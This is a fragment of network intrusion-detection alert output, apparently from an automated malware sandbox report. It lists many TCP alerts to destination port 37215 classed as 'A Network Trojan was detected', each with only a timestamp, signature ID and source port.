          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403329
          SID:2829579
          Source Port:60306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067113
          SID:2829579
          Source Port:36902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781227
          SID:2829579
          Source Port:34324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152236
          SID:2835222
          Source Port:44802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.916794
          SID:2829579
          Source Port:57448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.230227
          SID:2835222
          Source Port:56464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269484
          SID:2829579
          Source Port:40920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.079499
          SID:2835222
          Source Port:36744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.499967
          SID:2835222
          Source Port:37784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810719
          SID:2835222
          Source Port:37250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.903472
          SID:2829579
          Source Port:37318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196901
          SID:2835222
          Source Port:55976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941292
          SID:2835222
          Source Port:57596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265776
          SID:2829579
          Source Port:50512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893521
          SID:2835222
          Source Port:44644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102191
          SID:2829579
          Source Port:36202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707553
          SID:2829579
          Source Port:49804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846987
          SID:2835222
          Source Port:37080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301162
          SID:2829579
          Source Port:41472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.800663
          SID:2829579
          Source Port:53100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818039
          SID:2835222
          Source Port:47416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.857164
          SID:2829579
          Source Port:58922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885701
          SID:2829579
          Source Port:42146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893354
          SID:2835222
          Source Port:46556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663952
          SID:2835222
          Source Port:37332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.367107
          SID:2829579
          Source Port:47684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400610
          SID:2835222
          Source Port:41410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.700520
          SID:2829579
          Source Port:49124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227085
          SID:2829579
          Source Port:49080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680693
          SID:2835222
          Source Port:49310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.625644
          SID:2829579
          Source Port:56062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330036
          SID:2829579
          Source Port:33066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809045
          SID:2829579
          Source Port:47296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285890
          SID:2835222
          Source Port:48050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726945
          SID:2835222
          Source Port:60480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962918
          SID:2835222
          Source Port:56180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271617
          SID:2829579
          Source Port:58744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369440
          SID:2829579
          Source Port:39328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778922
          SID:2835222
          Source Port:56436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.809479
          SID:2835222
          Source Port:57442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931002
          SID:2835222
          Source Port:54696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.114403
          SID:2829579
          Source Port:40938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852117
          SID:2829579
          Source Port:55358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709329
          SID:2835222
          Source Port:47100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739279
          SID:2829579
          Source Port:58178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426905
          SID:2829579
          Source Port:48450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266423
          SID:2835222
          Source Port:43524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588991
          SID:2835222
          Source Port:46108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946649
          SID:2835222
          Source Port:39548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591880
          SID:2835222
          Source Port:46256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401632
          SID:2835222
          Source Port:37816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486302
          SID:2835222
          Source Port:42396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710975
          SID:2835222
          Source Port:59290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337996
          SID:2835222
          Source Port:58658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095835
          SID:2835222
          Source Port:59626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051020
          SID:2835222
          Source Port:54328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671598
          SID:2835222
          Source Port:35510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146336
          SID:2835222
          Source Port:47558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726670
          SID:2835222
          Source Port:44900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183712
          SID:2829579
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202948
          SID:2835222
          Source Port:58486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.802765
          SID:2835222
          Source Port:33990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651334
          SID:2829579
          Source Port:53804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.929902
          SID:2829579
          Source Port:36792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485846
          SID:2829579
          Source Port:36998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022444
          SID:2835222
          Source Port:40004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796019
          SID:2829579
          Source Port:37620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.229989
          SID:2829579
          Source Port:48724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.672127
          SID:2829579
          Source Port:56356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.371449
          SID:2835222
          Source Port:52990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296283
          SID:2829579
          Source Port:51976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.600484
          SID:2829579
          Source Port:58014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.723989
          SID:2835222
          Source Port:41918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221761
          SID:2829579
          Source Port:48034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.338172
          SID:2829579
          Source Port:38758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553968
          SID:2829579
          Source Port:57700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202585
          SID:2835222
          Source Port:54440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322133
          SID:2835222
          Source Port:57448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114535
          SID:2829579
          Source Port:44338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605548
          SID:2835222
          Source Port:59146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.970180
          SID:2829579
          Source Port:34660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.679565
          SID:2829579
          Source Port:48782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885990
          SID:2829579
          Source Port:41068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321060
          SID:2829579
          Source Port:35690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.618527
          SID:2829579
          Source Port:38444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992851
          SID:2829579
          Source Port:55472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350065
          SID:2835222
          Source Port:38154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.997060
          SID:2829579
          Source Port:45770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923484
          SID:2835222
          Source Port:50578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667405
          SID:2829579
          Source Port:56896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868638
          SID:2835222
          Source Port:55294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.231023
          SID:2835222
          Source Port:52724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594785
          SID:2835222
          Source Port:60672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.284185
          SID:2835222
          Source Port:41112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818094
          SID:2835222
          Source Port:58446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.420546
          SID:2835222
          Source Port:38682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145218
          SID:2829579
          Source Port:40164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593181
          SID:2829579
          Source Port:45102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.138291
          SID:2829579
          Source Port:58222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369081
          SID:2835222
          Source Port:54276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.681486
          SID:2835222
          Source Port:48364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.359044
          SID:2835222
          Source Port:54468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240542
          SID:2835222
          Source Port:36450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140201
          SID:2835222
          Source Port:46948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.916674
          SID:2835222
          Source Port:48994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195769
          SID:2829579
          Source Port:57732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.984307
          SID:2835222
          Source Port:52118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273501
          SID:2835222
          Source Port:49476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893543
          SID:2829579
          Source Port:43772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156265
          SID:2835222
          Source Port:53700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550653
          SID:2829579
          Source Port:58620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927699
          SID:2835222
          Source Port:46594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542065
          SID:2835222
          Source Port:37632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.280836
          SID:2829579
          Source Port:41852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.432967
          SID:2835222
          Source Port:52538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.438183
          SID:2829579
          Source Port:44226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711380
          SID:2829579
          Source Port:53756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211586
          SID:2829579
          Source Port:59096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.093095
          SID:2829579
          Source Port:43276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497112
          SID:2835222
          Source Port:39534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.471370
          SID:2835222
          Source Port:47362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156781
          SID:2835222
          Source Port:35010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890945
          SID:2835222
          Source Port:58306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305556
          SID:2835222
          Source Port:55830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.319012
          SID:2829579
          Source Port:55246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988624
          SID:2835222
          Source Port:37230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711581
          SID:2829579
          Source Port:52206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.862012
          SID:2835222
          Source Port:49480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961719
          SID:2835222
          Source Port:43628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.316443
          SID:2835222
          Source Port:47596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.773816
          SID:2835222
          Source Port:60018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708965
          SID:2829579
          Source Port:53994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.514234
          SID:2829579
          Source Port:46446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710543
          SID:2829579
          Source Port:55238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804549
          SID:2835222
          Source Port:55682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817649
          SID:2829579
          Source Port:49222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.991069
          SID:2835222
          Source Port:40510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.550101
          SID:2829579
          Source Port:37064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113060
          SID:2829579
          Source Port:37356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806505
          SID:2829579
          Source Port:53700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296283
          SID:2835222
          Source Port:44422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651335
          SID:2835222
          Source Port:39722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656246
          SID:2835222
          Source Port:46896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535729
          SID:2835222
          Source Port:43270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183603
          SID:2829579
          Source Port:43342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.499745
          SID:2835222
          Source Port:34580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183075
          SID:2835222
          Source Port:44230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771748
          SID:2829579
          Source Port:59110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338476
          SID:2835222
          Source Port:53754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.183171
          SID:2835222
          Source Port:47442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795939
          SID:2835222
          Source Port:48874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209499
          SID:2835222
          Source Port:55720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.692095
          SID:2835222
          Source Port:45182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.432522
          SID:2835222
          Source Port:60140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485875
          SID:2829579
          Source Port:52626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553851
          SID:2829579
          Source Port:45460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710750
          SID:2835222
          Source Port:59142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681209
          SID:2829579
          Source Port:56170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048733
          SID:2835222
          Source Port:53370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175975
          SID:2829579
          Source Port:52884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.499881
          SID:2835222
          Source Port:53926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815453
          SID:2835222
          Source Port:36356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486054
          SID:2829579
          Source Port:49142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068596
          SID:2835222
          Source Port:54886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273185
          SID:2829579
          Source Port:49032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464173
          SID:2835222
          Source Port:56094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530137
          SID:2835222
          Source Port:60904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635149
          SID:2835222
          Source Port:40376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161339
          SID:2829579
          Source Port:38026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470603
          SID:2829579
          Source Port:51280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152772
          SID:2829579
          Source Port:52844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841959
          SID:2835222
          Source Port:50246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486336
          SID:2835222
          Source Port:51730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272394
          SID:2829579
          Source Port:32858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.249950
          SID:2835222
          Source Port:34172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711352
          SID:2835222
          Source Port:37744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764351
          SID:2829579
          Source Port:34184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402109
          SID:2835222
          Source Port:53534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527944
          SID:2829579
          Source Port:34044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.372036
          SID:2829579
          Source Port:38260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513105
          SID:2829579
          Source Port:38270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102832
          SID:2829579
          Source Port:56740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093252
          SID:2829579
          Source Port:45498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.857281
          SID:2835222
          Source Port:44546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755583
          SID:2835222
          Source Port:58020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592966
          SID:2835222
          Source Port:42076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283930
          SID:2835222
          Source Port:48514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191915
          SID:2835222
          Source Port:36398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996650
          SID:2835222
          Source Port:40462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207003
          SID:2829579
          Source Port:34142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891527
          SID:2829579
          Source Port:50422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225802
          SID:2835222
          Source Port:50332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914090
          SID:2829579
          Source Port:49032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665378
          SID:2829579
          Source Port:49024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.235907
          SID:2829579
          Source Port:43124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.631457
          SID:2829579
          Source Port:53860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890945
          SID:2835222
          Source Port:45264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
